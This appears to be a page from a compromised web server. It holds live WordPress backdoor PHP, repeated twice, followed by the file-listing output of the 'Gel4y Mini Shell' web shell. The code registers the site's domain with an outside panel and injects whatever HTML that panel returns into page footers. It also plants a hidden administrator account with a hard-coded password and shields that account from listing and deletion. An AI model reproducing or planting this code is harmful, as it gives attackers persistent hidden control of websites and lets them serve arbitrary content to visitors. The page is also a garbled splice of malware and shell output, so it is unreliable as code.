function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> Gel4y Mini Shell

Gel4y Mini Shell

PHP Version : 7.4.33
+File +Directory
  • Server : x3immune.vn (157.245.199.161/216.73.216.187)
  • Path: ~/lib/python3.8/lib2to3/fixes/__pycache__/
    Name Size Permission Action
    __init__.cpython-38.pyc 0.132KB -rw-r--r--
    fix_apply.cpython-38.pyc 1.634KB -rw-r--r--
    fix_asserts.cpython-38.pyc 1.242KB -rw-r--r--
    fix_basestring.cpython-38.pyc 0.641KB -rw-r--r--
    fix_buffer.cpython-38.pyc 0.782KB -rw-r--r--
    fix_dict.cpython-38.pyc 3.25KB -rw-r--r--
    fix_except.cpython-38.pyc 2.745KB -rw-r--r--
    fix_exec.cpython-38.pyc 1.115KB -rw-r--r--
    fix_execfile.cpython-38.pyc 1.65KB -rw-r--r--
    fix_exitfunc.cpython-38.pyc 2.245KB -rw-r--r--
    fix_filter.cpython-38.pyc 2.38KB -rw-r--r--
    fix_funcattrs.cpython-38.pyc 0.946KB -rw-r--r--
    fix_future.cpython-38.pyc 0.759KB -rw-r--r--
    fix_getcwdu.cpython-38.pyc 0.763KB -rw-r--r--
    fix_has_key.cpython-38.pyc 2.863KB -rw-r--r--
    fix_idioms.cpython-38.pyc 3.822KB -rw-r--r--
    fix_import.cpython-38.pyc 2.715KB -rw-r--r--
    fix_imports.cpython-38.pyc 4.285KB -rw-r--r--
    fix_imports2.cpython-38.pyc 0.526KB -rw-r--r--
    fix_input.cpython-38.pyc 0.921KB -rw-r--r--
    fix_intern.cpython-38.pyc 1.101KB -rw-r--r--
    fix_isinstance.cpython-38.pyc 1.508KB -rw-r--r--
    fix_itertools.cpython-38.pyc 1.507KB -rw-r--r--
    fix_itertools_imports.cpython-38.pyc 1.534KB -rw-r--r--
    fix_long.cpython-38.pyc 0.682KB -rw-r--r--
    fix_map.cpython-38.pyc 3.018KB -rw-r--r--
    fix_metaclass.cpython-38.pyc 5.215KB -rw-r--r--
    fix_methodattrs.cpython-38.pyc 0.909KB -rw-r--r--
    fix_ne.cpython-38.pyc 0.785KB -rw-r--r--
    fix_next.cpython-38.pyc 3.004KB -rw-r--r--
    fix_nonzero.cpython-38.pyc 0.895KB -rw-r--r--
    fix_numliterals.cpython-38.pyc 0.992KB -rw-r--r--
    fix_operator.cpython-38.pyc 4.114KB -rw-r--r--
    fix_paren.cpython-38.pyc 1.351KB -rw-r--r--
    fix_print.cpython-38.pyc 2.281KB -rw-r--r--
    fix_raise.cpython-38.pyc 2.193KB -rw-r--r--
    fix_raw_input.cpython-38.pyc 0.77KB -rw-r--r--
    fix_reduce.cpython-38.pyc 1.095KB -rw-r--r--
    fix_reload.cpython-38.pyc 1.112KB -rw-r--r--
    fix_renames.cpython-38.pyc 1.953KB -rw-r--r--
    fix_repr.cpython-38.pyc 0.818KB -rw-r--r--
    fix_set_literal.cpython-38.pyc 1.637KB -rw-r--r--
    fix_standarderror.cpython-38.pyc 0.696KB -rw-r--r--
    fix_sys_exc.cpython-38.pyc 1.371KB -rw-r--r--
    fix_throw.cpython-38.pyc 1.759KB -rw-r--r--
    fix_tuple_params.cpython-38.pyc 4.477KB -rw-r--r--
    fix_types.cpython-38.pyc 1.787KB -rw-r--r--
    fix_unicode.cpython-38.pyc 1.506KB -rw-r--r--
    fix_urllib.cpython-38.pyc 5.852KB -rw-r--r--
    fix_ws_comma.cpython-38.pyc 1.086KB -rw-r--r--
    fix_xrange.cpython-38.pyc 2.463KB -rw-r--r--
    fix_xreadlines.cpython-38.pyc 1.09KB -rw-r--r--
    fix_zip.cpython-38.pyc 1.539KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet